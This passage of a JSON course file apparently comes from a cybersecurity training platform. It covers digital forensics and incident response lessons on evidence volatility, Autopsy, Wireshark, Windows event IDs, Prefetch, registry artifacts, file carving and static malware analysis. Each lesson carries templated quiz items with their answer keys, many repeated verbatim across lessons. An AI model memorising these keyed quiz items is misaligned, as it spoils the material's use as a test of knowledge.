execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-volatile-order","cat":"Forensics & IR","title":"Order of Volatility","diff":1,"xp":50,"intro":"Collect the most volatile evidence first.","sections":[{"type":"text","content":"Collect the most volatile evidence first."},{"type":"code","lang":"bash","content":"Registers -> RAM -> Network -> Processes -> Disk -> Backups"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Why collect RAM first?","opts":["It's largest","It's lost on power off (volatile)","It's most interesting","It's encrypted"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-autopsy","cat":"Forensics & IR","title":"Autopsy Digital Forensics","diff":2,"xp":150,"intro":"Open-source forensic analysis platform.","sections":[{"type":"text","content":"Open-source forensic analysis platform."},{"type":"code","lang":"bash","content":"Timeline analysis, keyword search, hash matching, file carving, web artifacts"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Autopsy analyzes...","opts":["Network traffic","Disk images for forensic artifacts","Memory dumps","Live systems"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-wireshark-forensics","cat":"Forensics & IR","title":"Network Forensics with Wireshark","diff":2,"xp":150,"intro":"Reconstruct network events from packet captures.","sections":[{"type":"text","content":"Reconstruct network events from packet captures."},{"type":"code","lang":"bash","content":"Follow streams, extract files, find credentials, identify C2 traffic"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Wireshark's 'Follow TCP Stream' shows...","opts":["Only headers","The complete conversation between two hosts","Only packets","DNS queries only"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-event-log","cat":"Forensics & IR","title":"Windows Event Log Analysis","diff":2,"xp":150,"intro":"Key event IDs for security investigation.","sections":[{"type":"text","content":"Key event IDs for security investigation."},{"type":"code","lang":"bash","content":"4624 (logon), 4625 (failed), 4672 (admin logon), 1102 (log cleared)"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Event ID 4625 means...","opts":["Successful login","Failed login attempt","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-prefetch","cat":"Forensics & IR","title":"Prefetch File Analysis","diff":2,"xp":150,"intro":"Prove program execution on Windows.","sections":[{"type":"text","content":"Prove program execution on Windows."},{"type":"code","lang":"bash","content":"Prefetch records: binary name, run count, last 8 timestamps, referenced files"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","That a program was executed and when","Network connections","User identity"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-registry","cat":"Forensics & IR","title":"Registry Forensics","diff":2,"xp":150,"intro":"Windows registry stores user activity and system config.","sections":[{"type":"text","content":"Windows registry stores user activity and system config."},{"type":"code","lang":"bash","content":"RecentDocs, USBSTOR, NetworkList, RunMRU \u2014 key forensic artifacts"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"USB history is stored in...","opts":["Event logs","USBSTOR registry key","Prefetch","Amcache"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-carving","cat":"Forensics & IR","title":"File Carving Techniques","diff":2,"xp":150,"intro":"Recover deleted files by scanning for file headers.","sections":[{"type":"text","content":"Recover deleted files by scanning for file headers."},{"type":"code","lang":"bash","content":"foremost, scalpel, photorec scan raw data for magic bytes to recover files"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"File carving uses...","opts":["Filenames","File headers (magic bytes) to recover deleted files","Directory entries","File extensions"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-fo-malware-static","cat":"Forensics & IR","title":"Malware Static Analysis","diff":2,"xp":150,"intro":"Analyze malware without executing it.","sections":[{"type":"text","content":"Analyze malware without executing it."},{"type":"code","lang":"bash","content":"strings, PE headers, imports, entropy \u2014 identify capabilities and IOCs"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"High entropy in a PE section suggests...","opts":["Normal code","Packed or encrypted content","Debug symbols","Documentation"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts 